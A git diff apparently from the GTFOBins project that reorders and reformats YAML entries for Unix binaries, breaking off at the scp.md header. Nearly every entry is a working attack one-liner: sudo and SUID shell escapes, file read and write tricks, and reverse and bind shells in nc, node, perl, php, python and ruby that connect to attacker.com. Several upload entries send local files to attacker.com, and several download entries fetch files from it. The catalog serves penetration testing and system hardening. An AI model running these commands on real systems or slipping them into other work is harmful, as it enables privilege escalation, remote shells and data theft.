diff --git a/_gtfobins/mail.md b/_gtfobins/mail.md
index c6f46d1..ec40e5a 100644
--- a/_gtfobins/mail.md
+++ b/_gtfobins/mail.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ mail -f $TF
+ !/bin/sh
sudo-enabled:
- - description: This creates a valid Mbox file which may be required by the binary.
- code: |
- TF=$(mktemp)
- echo "From nobody@localhost $(date)" > $TF
- sudo mail -f $TF
- !/bin/sh
+ - description: This creates a valid Mbox file which may be required by the binary.
+ code: |
+ TF=$(mktemp)
+ echo "From nobody@localhost $(date)" > $TF
+ sudo mail -f $TF
+ !/bin/sh
---
diff --git a/_gtfobins/make.md b/_gtfobins/make.md
index ec86fc7..4153bdf 100644
--- a/_gtfobins/make.md
+++ b/_gtfobins/make.md
@@ -5,20 +5,20 @@ description: |
passing the content via stdin using `-f -`.
functions:
execute-interactive:
- - code: |
- COMMAND='/bin/sh'
- make -s --eval=$'x:\n\t-'"$COMMAND"
- sudo-enabled:
- - code: |
- COMMAND='/bin/sh'
- sudo make -s --eval=$'x:\n\t-'"$COMMAND"
- suid-enabled:
- - code: |
- COMMAND='/bin/sh -p'
- ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ - code: |
+ COMMAND='/bin/sh'
+ make -s --eval=$'x:\n\t-'"$COMMAND"
file-write:
- - description: Requires a newer GNU `make` version.
- code: |
- LFILE=file_to_write
- make -s --eval="\$(file >$LFILE,data)" .
+ - description: Requires a newer GNU `make` version.
+ code: |
+ LFILE=file_to_write
+ make -s --eval="\$(file >$LFILE,data)" .
+ suid-enabled:
+ - code: |
+ COMMAND='/bin/sh -p'
+ ./make -s --eval=$'x:\n\t-'"$COMMAND"
+ sudo-enabled:
+ - code: |
+ COMMAND='/bin/sh'
+ sudo make -s --eval=$'x:\n\t-'"$COMMAND"
---
diff --git a/_gtfobins/man.md b/_gtfobins/man.md
index 43814c7..8ccabe2 100644
--- a/_gtfobins/man.md
+++ b/_gtfobins/man.md
@@ -1,18 +1,19 @@
---
functions:
execute-interactive:
- - code: |
- man man
- !/bin/sh
- sudo-enabled:
- - code: |
- sudo man man
- !/bin/sh
- suid-limited:
- - code: |
- ./man man
- !/bin/sh
+ - code: |
+ man man
+ !/bin/sh
file-read:
- - code: |
- man file_to_read
+ - code: 'man file_to_read
+
+'
+ sudo-enabled:
+ - code: |
+ sudo man man
+ !/bin/sh
+ suid-limited:
+ - code: |
+ ./man man
+ !/bin/sh
---
diff --git a/_gtfobins/more.md b/_gtfobins/more.md
index eda72d0..823fa04 100644
--- a/_gtfobins/more.md
+++ b/_gtfobins/more.md
@@ -1,17 +1,17 @@
---
functions:
execute-interactive:
- - code: |
- TERM= more /etc/profile
- !/bin/sh
- sudo-enabled:
- - code: |
- TERM= sudo -E more /etc/profile
- !/bin/sh
- suid-enabled:
- - code: |
- ./more file_to_read
+ - code: |
+ TERM= more /etc/profile
+ !/bin/sh
file-read:
- - code: |
- more file_to_read
+ - code: 'more file_to_read
+
+'
+ suid-enabled:
+ - code: "./more file_to_read\n"
+ sudo-enabled:
+ - code: |
+ TERM= sudo -E more /etc/profile
+ !/bin/sh
---
diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md
index f4895e1..d45f451 100644
--- a/_gtfobins/nano.md
+++ b/_gtfobins/nano.md
@@ -1,37 +1,38 @@
---
functions:
execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- nano -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo nano -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./nano -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- nano file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ nano -s $TF /etc/hosts
+ ^T
file-write:
- - code: |
- nano file_to_write
- ^O
+ - code: |
+ nano file_to_write
+ ^O
+ file-read:
+ - code: 'nano file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./nano -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo nano -s $TF /etc/hosts
+ ^T
---
diff --git a/_gtfobins/nc.md b/_gtfobins/nc.md
index fc4e27b..b285423 100644
--- a/_gtfobins/nc.md
+++ b/_gtfobins/nc.md
@@ -1,27 +1,29 @@
---
functions:
- upload:
- - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
- code: |
- RHOST=attacker.com
- RPORT=12345
- LFILE=file_to_send
- nc $RHOST $RPORT < "$LFILE"
- download:
- - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345 < "file_to_send"` on the attacker box to send the file.
- code: |
- LPORT=12345
- LFILE=file_to_save
- nc -l -p $LPORT > "$LFILE"
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- RHOST=attacker.com
- RPORT=12345
- nc -e /bin/sh $RHOST $RPORT
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ nc -e /bin/sh $RHOST $RPORT
bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- LPORT=12345
- nc -l -p $LPORT -e /bin/sh
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ LPORT=12345
+ nc -l -p $LPORT -e /bin/sh
+ upload:
+ - description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"`
+ on the attacker box to collect the file.
+ code: |
+ RHOST=attacker.com
+ RPORT=12345
+ LFILE=file_to_send
+ nc $RHOST $RPORT < "$LFILE"
+ download:
+ - description: Fetch remote file from a remote TCP port. Run `nc target.com 12345
+ < "file_to_send"` on the attacker box to send the file.
+ code: |
+ LPORT=12345
+ LFILE=file_to_save
+ nc -l -p $LPORT > "$LFILE"
---
diff --git a/_gtfobins/nl.md b/_gtfobins/nl.md
index f8309cc..4d57bd2 100644
--- a/_gtfobins/nl.md
+++ b/_gtfobins/nl.md
@@ -1,17 +1,19 @@
---
-description: |
- The read file content is corrupted by a leading space added to each line.
+description: 'The read file content is corrupted by a leading space added to each
+ line.
+
+'
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo nl -bn -w1 -s '' $LFILE
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./nl -bn -w1 -s '' $LFILE
file-read:
- - code: |
- LFILE=file_to_read
- nl -bn -w1 -s '' $LFILE
+ - code: |
+ LFILE=file_to_read
+ nl -bn -w1 -s '' $LFILE
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./nl -bn -w1 -s '' $LFILE
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo nl -bn -w1 -s '' $LFILE
---
diff --git a/_gtfobins/node.md b/_gtfobins/node.md
index 9c9aa35..214c045 100644
--- a/_gtfobins/node.md
+++ b/_gtfobins/node.md
@@ -1,33 +1,38 @@
---
functions:
execute-interactive:
- - code: |
- node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- sudo-enabled:
- - code: |
- sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
- suid-enabled:
- - code: |
- ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
+ - code: 'node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});''
+
+'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- net.connect(process.env.RPORT, process.env.RHOST, function () {
- this.pipe(sh.stdin);
- sh.stdout.pipe(this);
- sh.stderr.pipe(this);
- });'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ net.connect(process.env.RPORT, process.env.RHOST, function () {
+ this.pipe(sh.stdin);
+ sh.stdout.pipe(this);
+ sh.stderr.pipe(this);
+ });'
bind-shell-interactive:
- - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
- code: |
- export LPORT=12345
- node -e 'sh = require("child_process").spawn("/bin/sh");
- require("net").createServer(function (client) {
- client.pipe(sh.stdin);
- sh.stdout.pipe(client);
- sh.stderr.pipe(client);
- }).listen(process.env.LPORT);'
+ - description: Run `nc target.com 12345` on the attacker box to connect to the shell.
+ code: |
+ export LPORT=12345
+ node -e 'sh = require("child_process").spawn("/bin/sh");
+ require("net").createServer(function (client) {
+ client.pipe(sh.stdin);
+ sh.stdout.pipe(client);
+ sh.stderr.pipe(client);
+ }).listen(process.env.LPORT);'
+ suid-enabled:
+ - code: './node -e ''require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0,
+ 1, 2]});''
+
+'
+ sudo-enabled:
+ - code: 'sudo node -e ''require("child_process").spawn("/bin/sh", {stdio: [0, 1,
+ 2]});''
+
+'
---
diff --git a/_gtfobins/od.md b/_gtfobins/od.md
index 4cf623b..8644d85 100644
--- a/_gtfobins/od.md
+++ b/_gtfobins/od.md
@@ -3,16 +3,16 @@ description: |
Three spaces are added before each character in the read file, and
non-printable chars are printed as backslash escape sequences.
functions:
- sudo-enabled:
- - code: |
- LFILE=file_to_read
- sudo od -An -c -w9999 "$LFILE"
- suid-enabled:
- - code: |
- LFILE=file_to_read
- ./od -An -c -w9999 "$LFILE"
file-read:
- - code: |
- LFILE=file_to_read
- od -An -c -w9999 "$LFILE"
+ - code: |
+ LFILE=file_to_read
+ od -An -c -w9999 "$LFILE"
+ suid-enabled:
+ - code: |
+ LFILE=file_to_read
+ ./od -An -c -w9999 "$LFILE"
+ sudo-enabled:
+ - code: |
+ LFILE=file_to_read
+ sudo od -An -c -w9999 "$LFILE"
---
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index c423a7f..f781b65 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -1,15 +1,15 @@
---
functions:
execute-interactive:
- - code: perl -e 'exec "/bin/sh";'
- sudo-enabled:
- - code: sudo perl -e 'exec "/bin/sh";'
- suid-enabled:
- - code: ./perl -e 'exec "/bin/sh";'
+ - code: perl -e 'exec "/bin/sh";'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+ suid-enabled:
+ - code: ./perl -e 'exec "/bin/sh";'
+ sudo-enabled:
+ - code: sudo perl -e 'exec "/bin/sh";'
---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 944ba2a..ca9e4ea 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -17,33 +17,34 @@ functions:
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive:
- - code: |
- export CMD="id"
- php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
- sudo-enabled:
- - code: |
- CMD="/bin/sh"
- sudo php -r "system('$CMD');"
- suid-enabled:
- - code: |
- CMD="/bin/sh"
- ./php -r "system('$CMD');"
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
- code: |
- LHOST=0.0.0.0
- LPORT=8888
- php -S $LHOST:$LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ - code: |
+ export CMD="id"
+ php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ PHP version 5.4 or later.
+ code: |
+ LHOST=0.0.0.0
+ LPORT=8888
+ php -S $LHOST:$LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
+ suid-enabled:
+ - code: |
+ CMD="/bin/sh"
+ ./php -r "system('$CMD');"
+ sudo-enabled:
+ - code: |
+ CMD="/bin/sh"
+ sudo php -r "system('$CMD');"
---
diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md
index 24c9ff4..c64f482 100644
--- a/_gtfobins/pico.md
+++ b/_gtfobins/pico.md
@@ -1,37 +1,38 @@
---
functions:
execute-non-interactive:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- pico -s $TF /etc/hosts
- ^T
- sudo-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo "$COMMAND" > $TF
- chmod +x $TF
- sudo pico -s $TF /etc/hosts
- ^T
- suid-enabled:
- - description: After running this exit the editor to see the command output.
- code: |
- COMMAND=id
- TF=$(mktemp)
- echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
- chmod +x $TF
- ./pico -s $TF /etc/hosts
- ^T
- file-read:
- - code: |
- pico file_to_read
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ pico -s $TF /etc/hosts
+ ^T
file-write:
- - code: |
- pico file_to_write
- ^O
+ - code: |
+ pico file_to_write
+ ^O
+ file-read:
+ - code: 'pico file_to_read
+
+'
+ suid-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo $'#!/bin/sh -p\n'"$COMMAND" > $TF
+ chmod +x $TF
+ ./pico -s $TF /etc/hosts
+ ^T
+ sudo-enabled:
+ - description: After running this exit the editor to see the command output.
+ code: |
+ COMMAND=id
+ TF=$(mktemp)
+ echo "$COMMAND" > $TF
+ chmod +x $TF
+ sudo pico -s $TF /etc/hosts
+ ^T
---
diff --git a/_gtfobins/puppet.md b/_gtfobins/puppet.md
index de2c5ef..a4ae2d9 100644
--- a/_gtfobins/puppet.md
+++ b/_gtfobins/puppet.md
@@ -1,23 +1,24 @@
---
functions:
execute-non-interactive:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- puppet apply -e "exec { '$CMD': logoutput => true }"
- sudo-enabled:
- - description: The executed command output shown in the puppet log format.
- code: |
- export CMD="/usr/bin/id"
- sudo puppet apply -e "exec { '$CMD': logoutput => true }"
- file-read:
- - description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
- code: |
- export LFILE=file_to_read
- puppet filebucket -l diff /dev/null $LFILE
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ puppet apply -e "exec { '$CMD': logoutput => true }"
file-write:
- - description: The file path must be absolute.
- code: |
- export LFILE="/tmp/file_to_write"
- puppet apply -e "file { '$LFILE': content => 'data' }"
+ - description: The file path must be absolute.
+ code: |
+ export LFILE="/tmp/file_to_write"
+ puppet apply -e "file { '$LFILE': content => 'data' }"
+ file-read:
+ - description: The read file content is corrupted by the `diff` output format. The
+ actual `/usr/bin/diff` command is executed.
+ code: |
+ export LFILE=file_to_read
+ puppet filebucket -l diff /dev/null $LFILE
+ sudo-enabled:
+ - description: The executed command output shown in the puppet log format.
+ code: |
+ export CMD="/usr/bin/id"
+ sudo puppet apply -e "exec { '$CMD': logoutput => true }"
---
diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md
index ea943c0..f2cce96 100644
--- a/_gtfobins/python2.md
+++ b/_gtfobins/python2.md
@@ -1,37 +1,39 @@
---
functions:
execute-interactive:
- - code: python2 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python2 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- export LPORT=8888
- python2 -m SimpleHTTPServer $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
+ - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python2 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python2 -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ export LPORT=8888
+ python2 -m SimpleHTTPServer $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
file-write:
- - code: python2 -c 'open("file_to_write","w+").write("data")'
+ - code: python2 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python2 -c 'open("file_to_read").read()'
load-library:
- - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python2 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python2 -c 'import os; os.system("/bin/sh")'
---
diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md
index 9796842..719151a 100644
--- a/_gtfobins/python3.md
+++ b/_gtfobins/python3.md
@@ -1,37 +1,39 @@
---
functions:
execute-interactive:
- - code: python3 -c 'import os; os.system("/bin/sh")'
- sudo-enabled:
- - code: sudo python3 -c 'import os; os.system("/bin/sh")'
- suid-enabled:
- - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
- upload:
- - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
- code: |
- export URL=http://attacker.com/
- export LFILE=file_to_send
- python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
- - description: Serve files in the local folder running an HTTP server.
- code: |
- LPORT=8888
- python3 -m http.server $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export URL=http://attacker.com/file_to_get
- export LFILE=file_to_save
- python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
+ - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
- - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
- file-read:
- - code: python3 -c 'open("file_to_read").read()'
+ - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345
on
+ the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
+ upload:
+ - description: Send local file via "d" parameter of a HTTP POST request. Run an
+ HTTP service on the attacker box to collect the file.
+ code: |
+ export URL=http://attacker.com/
+ export LFILE=file_to_send
+ python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
+ - description: Serve files in the local folder running an HTTP server.
+ code: |
+ LPORT=8888
+ python3 -m http.server $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export URL=http://attacker.com/file_to_get
+ export LFILE=file_to_save
+ python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
file-write:
- - code: python3 -c 'open("file_to_write","w+").write("data")'
+ - code: python3 -c 'open("file_to_write","w+").write("data")'
+ file-read:
+ - code: python3 -c 'open("file_to_read").read()'
load-library:
- - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
+ suid-enabled:
+ - code: ./python3 -c 'import os; os.system("/bin/sh -p")'
+ sudo-enabled:
+ - code: sudo python3 -c 'import os; os.system("/bin/sh")'
---
diff --git a/_gtfobins/rlwrap.md b/_gtfobins/rlwrap.md
index 65c1639..254f12d 100644
--- a/_gtfobins/rlwrap.md
+++ b/_gtfobins/rlwrap.md
@@ -1,14 +1,15 @@
---
functions:
execute-interactive:
- - code: rlwrap /bin/sh
- sudo-enabled:
- - code: sudo rlwrap /bin/sh
- suid-enabled:
- - code: ./rlwrap -H /dev/null /bin/sh -p
+ - code: rlwrap /bin/sh
file-write:
- - description: This adds timestamps to the output file. This relies on the external `echo` command.
- code: |
- LFILE=file_to_write
- rlwrap -l "$LFILE" echo data
+ - description: This adds timestamps to the output file. This relies on the external
+ `echo` command.
+ code: |
+ LFILE=file_to_write
+ rlwrap -l "$LFILE" echo data
+ suid-enabled:
+ - code: "./rlwrap -H /dev/null /bin/sh -p"
+ sudo-enabled:
+ - code: sudo rlwrap /bin/sh
---
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index 67d2f53..268c69f 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
- - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index 5d9eee1..ce85849 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -1,9 +1,9 @@
---
functions:
execute-interactive:
- - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
- sudo-enabled:
- - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
+ - code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
- - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
+ sudo-enabled:
+ - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index 0c36e04..1039257 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -1,32 +1,33 @@
---
functions:
execute-interactive:
- - code: ruby -e 'exec "/bin/sh"'
- sudo-enabled:
- - code: sudo ruby -e 'exec "/bin/sh"'
- upload:
- - description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
- code: |
- export LPORT=8888
- ruby -run -e httpd . -p $LPORT
- download:
- - description: Fetch a remote file via HTTP GET request.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- export RFILE=/file_to_get
- export LFILE=file_to_save
- ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
+ - code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
- - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
- export RHOST=attacker.com
- export RPORT=12345
- ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
- file-read:
- - code: ruby -e 'puts File.read("file_to_read")'
+ - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+ upload:
+ - description: Serve files in the local folder running an HTTP server. This requires
+ version 1.9.2 or later.
+ code: |
+ export LPORT=8888
+ ruby -run -e httpd . -p $LPORT
+ download:
+ - description: Fetch a remote file via HTTP GET request.
+ code: |
+ export RHOST=attacker.com
+ export RPORT=12345
+ export RFILE=/file_to_get
+ export LFILE=file_to_save
+ ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
file-write:
- - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
+ file-read:
+ - code: ruby -e 'puts File.read("file_to_read")'
load-library:
- - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
+ sudo-enabled:
+ - code: sudo ruby -e 'exec "/bin/sh"'
---
diff --git a/_gtfobins/scp.md b/_gtfobins/scp.md
index 9cc7489..711cf53 100644
--- a/_gtfobins/scp.md
